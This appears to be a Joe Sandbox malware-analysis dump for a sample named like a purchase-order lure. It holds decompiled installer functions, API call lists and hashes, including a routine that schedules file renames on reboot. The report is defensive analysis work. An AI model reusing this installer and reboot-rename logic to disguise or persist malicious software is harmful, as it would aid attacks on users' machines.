                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                      • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                      • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                      • ShowWindow.USER32(00000000), ref: 00405627
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 2564846305-813528018
                                                                                      • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                      • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                      • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                      • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void* _v16;
                                                                                      				struct HWND__* _t56;
                                                                                      				signed int _t75;
                                                                                      				signed short* _t76;
                                                                                      				signed short* _t78;
                                                                                      				long _t92;
                                                                                      				int _t103;
                                                                                      				signed int _t110;
                                                                                      				intOrPtr _t113;
                                                                                      				WCHAR* _t114;
                                                                                      				signed int* _t116;
                                                                                      				WCHAR* _t117;
                                                                                      				struct HWND__* _t118;
                                                                                      
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L13:
                                                                                      						if(_a8 != 0x4e) {
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								 *0x421714 =  *0x421714 + 1;
                                                                                      							}
                                                                                      							L27:
                                                                                      							_t114 = _a16;
                                                                                      							L28:
                                                                                      							return E0040462B(_a8, _a12, _t114);
                                                                                      						}
                                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                      						_t114 = _a16;
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                      							_v12 = _t103;
                                                                                      							_v16 = _t113;
                                                                                      							_v8 = 0x428200;
                                                                                      							if(_t103 - _t113 < 0x800) {
                                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                      								_push(1);
                                                                                      								E00404A32(_a4, _v8);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                      								_t114 = _a16;
                                                                                      							}
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                      								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                                      							}
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                      								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                                      							}
                                                                                      							return 1;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                                      						goto L27;
                                                                                      					} else {
                                                                                      						_t116 =  *0x422720 + 0x14;
                                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                                      							goto L27;
                                                                                      						}
                                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                      						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                      						E00404A0E();
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				_t117 = _a16;
                                                                                      				_t75 =  *(_t117 + 0x30);
                                                                                      				if(_t75 < 0) {
                                                                                      					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                                      				}
                                                                                      				_t76 =  *0x42a298 + _t75 * 2;
                                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                                      				_a8 = _t110;
                                                                                      				_t78 =  &(_t76[1]);
                                                                                      				_a16 = _t78;
                                                                                      				_v16 = _t78;
                                                                                      				_v12 = 0;
                                                                                      				_v8 = E00404734;
                                                                                      				if(_t110 != 2) {
                                                                                      					_v8 = E004046FA;
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                      				_push(0x22);
                                                                                      				E004045C4(_a4);
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                      				_push(0x23);
                                                                                      				E004045C4(_a4);
                                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                      				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                      				E004045F9(_t118);
                                                                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                      				_t92 =  *( *0x42a270 + 0x68);
                                                                                      				if(_t92 < 0) {
                                                                                      					_t92 = GetSysColor( ~_t92);
                                                                                      				}
                                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                      				 *0x421714 = 0;
                                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                      				 *0x421714 = 0;
                                                                                      				return 0;
                                                                                      			}


















                                                                                      0x00404795
                                                                                      0x004048c2
                                                                                      0x0040491f
                                                                                      0x00404923
                                                                                      0x004049f0
                                                                                      0x004049f2
                                                                                      0x004049f2
                                                                                      0x004049f8
                                                                                      0x004049f8
                                                                                      0x004049fb
                                                                                      0x00000000
                                                                                      0x00404a02
                                                                                      0x00404931
                                                                                      0x00404937
                                                                                      0x00404941
                                                                                      0x0040494c
                                                                                      0x0040494f
                                                                                      0x00404952
                                                                                      0x0040495d
                                                                                      0x00404960
                                                                                      0x00404967
                                                                                      0x00404974
                                                                                      0x00404985
                                                                                      0x0040498b
                                                                                      0x00404993
                                                                                      0x004049a1
                                                                                      0x004049a7
                                                                                      0x004049a7
                                                                                      0x00404967
                                                                                      0x004049b1
                                                                                      0x00000000
                                                                                      0x004049bc
                                                                                      0x004049c0
                                                                                      0x004049d0
                                                                                      0x004049d0
                                                                                      0x004049d6
                                                                                      0x004049e2
                                                                                      0x004049e2
                                                                                      0x00000000
                                                                                      0x004049e6
                                                                                      0x004049b1
                                                                                      0x004048cd
                                                                                      0x00000000
                                                                                      0x004048df
                                                                                      0x004048e4
                                                                                      0x004048ea
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404913
                                                                                      0x00404915
                                                                                      0x0040491a
                                                                                      0x00000000
                                                                                      0x0040491a
                                                                                      0x004048cd
                                                                                      0x0040479b
                                                                                      0x0040479e
                                                                                      0x004047a3
                                                                                      0x004047b4
                                                                                      0x004047b4
                                                                                      0x004047bc
                                                                                      0x004047bf
                                                                                      0x004047c3
                                                                                      0x004047c6
                                                                                      0x004047ca
                                                                                      0x004047cd
                                                                                      0x004047d0
                                                                                      0x004047d3
                                                                                      0x004047da
                                                                                      0x004047dc
                                                                                      0x004047dc
                                                                                      0x004047e6
                                                                                      0x004047f3
                                                                                      0x004047fd
                                                                                      0x00404802
                                                                                      0x00404805
                                                                                      0x0040480a
                                                                                      0x00404821
                                                                                      0x00404828
                                                                                      0x0040483b
                                                                                      0x0040483e
                                                                                      0x00404852
                                                                                      0x00404859
                                                                                      0x0040485e
                                                                                      0x00404863
                                                                                      0x00404863
                                                                                      0x00404871
                                                                                      0x0040487f
                                                                                      0x00404891
                                                                                      0x00404896
                                                                                      0x004048a6
                                                                                      0x004048a8
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                      • GetSysColor.USER32(?), ref: 00404863
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                      • SendMessageW.USER32(00000000), ref: 00404906
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                      • SetCursor.USER32(00000000), ref: 00404985
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                      • SetCursor.USER32(00000000), ref: 004049A1
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: Call$N
                                                                                      • API String ID: 3103080414-3438112850
                                                                                      • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                      • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                      • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                      • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004062AE(void* __ecx) {
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				long _t12;
                                                                                      				long _t24;
                                                                                      				char* _t31;
                                                                                      				int _t37;
                                                                                      				void* _t38;
                                                                                      				intOrPtr* _t39;
                                                                                      				long _t42;
                                                                                      				WCHAR* _t44;
                                                                                      				void* _t46;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t52;
                                                                                      				void* _t53;
                                                                                      
                                                                                      				_t38 = __ecx;
                                                                                      				_t44 =  *(_t52 + 0x14);
                                                                                      				 *0x426de8 = 0x55004e;
                                                                                      				 *0x426dec = 0x4c;
                                                                                      				if(_t44 == 0) {
                                                                                      					L3:
                                                                                      					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                                      					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                                      						_t53 = _t52 + 0x10;
                                                                                      						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                                      						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                                      						_t48 = _t12;
                                                                                      						 *(_t53 + 0x18) = _t48;
                                                                                      						if(_t48 != 0xffffffff) {
                                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                      							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                                      								L18:
                                                                                      								return CloseHandle(_t48);
                                                                                      							} else {
                                                                                      								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                      									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                                      									if(_t49 == 0) {
                                                                                      										_t48 =  *(_t53 + 0x18);
                                                                                      										L16:
                                                                                      										_t24 = _t42;
                                                                                      										L17:
                                                                                      										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                                      										E0040620A(_t48, _t46, _t42 + _t37);
                                                                                      										GlobalFree(_t46);
                                                                                      										goto L18;
                                                                                      									}
                                                                                      									_t39 = _t46 + _t42;
                                                                                      									_t31 = _t39 + _t37;
                                                                                      									while(_t39 > _t49) {
                                                                                      										 *_t31 =  *_t39;
                                                                                      										_t31 = _t31 - 1;
                                                                                      										_t39 = _t39 - 1;
                                                                                      									}
                                                                                      									_t24 = _t49 - _t46 + 1;
                                                                                      									_t48 =  *(_t53 + 0x18);
                                                                                      									goto L17;
                                                                                      								}
                                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                      								_t42 = _t42 + 0xa;
                                                                                      								goto L16;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					CloseHandle(E00406158(_t44, 0, 1));
                                                                                      					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t12;
                                                                                      			}



















                                                                                      0x004062ae
                                                                                      0x004062b7
                                                                                      0x004062be
                                                                                      0x004062c8
                                                                                      0x004062dc
                                                                                      0x00406304
                                                                                      0x0040630b
                                                                                      0x0040630f
                                                                                      0x00406313
                                                                                      0x00406333
                                                                                      0x0040633a
                                                                                      0x00406344
                                                                                      0x00406351
                                                                                      0x00406356
                                                                                      0x0040635b
                                                                                      0x0040635f
                                                                                      0x0040636e
                                                                                      0x00406370
                                                                                      0x0040637d
                                                                                      0x00406381
                                                                                      0x0040641c
                                                                                      0x00000000
                                                                                      0x00406397
                                                                                      0x004063a4
                                                                                      0x004063c8
                                                                                      0x004063cc
                                                                                      0x004063eb
                                                                                      0x004063ef
                                                                                      0x004063ef
                                                                                      0x004063f1
                                                                                      0x004063fa
                                                                                      0x00406405
                                                                                      0x00406410
                                                                                      0x00406416
                                                                                      0x00000000
                                                                                      0x00406416
                                                                                      0x004063ce
                                                                                      0x004063d1
                                                                                      0x004063dc
                                                                                      0x004063d8
                                                                                      0x004063da
                                                                                      0x004063db
                                                                                      0x004063db
                                                                                      0x004063e3
                                                                                      0x004063e5
                                                                                      0x00000000
                                                                                      0x004063e5
                                                                                      0x004063af
                                                                                      0x004063b5
                                                                                      0x00000000
                                                                                      0x004063b5
                                                                                      0x00406381
                                                                                      0x0040635f
                                                                                      0x004062de
                                                                                      0x004062e9
                                                                                      0x004062f2
                                                                                      0x004062f6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004062f6
                                                                                      0x00406427

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                      • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                      • wsprintfA.USER32 ref: 0040632D
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PO#4200000866.exe,80000000,00000003), ref: 0040615C
                                                                                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                      • API String ID: 2171350718-2295842750
                                                                                      • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                      • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                      • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                      • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				struct tagRECT _v32;
                                                                                      				struct tagPAINTSTRUCT _v96;
                                                                                      				struct HDC__* _t70;
                                                                                      				struct HBRUSH__* _t87;
                                                                                      				struct HFONT__* _t94;
                                                                                      				long _t102;
                                                                                      				signed int _t126;
                                                                                      				struct HDC__* _t128;
                                                                                      				intOrPtr _t130;
                                                                                      
                                                                                      				if(_a8 == 0xf) {
                                                                                      					_t130 =  *0x42a270;
                                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                      					_a8 = _t70;
                                                                                      					GetClientRect(_a4,  &_v32);
                                                                                      					_t126 = _v32.bottom;
                                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                      					while(_v32.top < _t126) {
                                                                                      						_a12 = _t126 - _v32.top;
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                                      						_a16 = _t87;
                                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                                      						DeleteObject(_a16);
                                                                                      						_v32.top = _v32.top + 4;
                                                                                      					}
                                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                      						_a16 = _t94;
                                                                                      						if(_t94 != 0) {
                                                                                      							_t128 = _a8;
                                                                                      							_v32.left = 0x10;
                                                                                      							_v32.top = 8;
                                                                                      							SetBkMode(_t128, 1);
                                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                                      							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                                      							SelectObject(_t128, _a8);
                                                                                      							DeleteObject(_a16);
                                                                                      						}
                                                                                      					}
                                                                                      					EndPaint(_a4,  &_v96);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t102 = _a16;
                                                                                      				if(_a8 == 0x46) {
                                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                                      				}
                                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                      			}













                                                                                      0x0040100a
                                                                                      0x00401039
                                                                                      0x00401047
                                                                                      0x0040104d
                                                                                      0x00401051
                                                                                      0x0040105b
                                                                                      0x00401061
                                                                                      0x00401064
                                                                                      0x004010f3
                                                                                      0x00401089
                                                                                      0x0040108c
                                                                                      0x004010a6
                                                                                      0x004010bd
                                                                                      0x004010cc
                                                                                      0x004010cf
                                                                                      0x004010d5
                                                                                      0x004010d9
                                                                                      0x004010e4
                                                                                      0x004010ed
                                                                                      0x004010ef
                                                                                      0x004010ef
                                                                                      0x00401100
                                                                                      0x00401105
                                                                                      0x0040110d
                                                                                      0x00401110
                                                                                      0x00401112
                                                                                      0x00401118
                                                                                      0x0040111f
                                                                                      0x00401126
                                                                                      0x00401130
                                                                                      0x00401142
                                                                                      0x00401156
                                                                                      0x00401160
                                                                                      0x00401165
                                                                                      0x00401165
                                                                                      0x00401110
                                                                                      0x0040116e
                                                                                      0x00000000
                                                                                      0x00401178
                                                                                      0x00401010
                                                                                      0x00401013
                                                                                      0x00401015
                                                                                      0x0040101f
                                                                                      0x0040101f
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                      • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                      • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                      • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

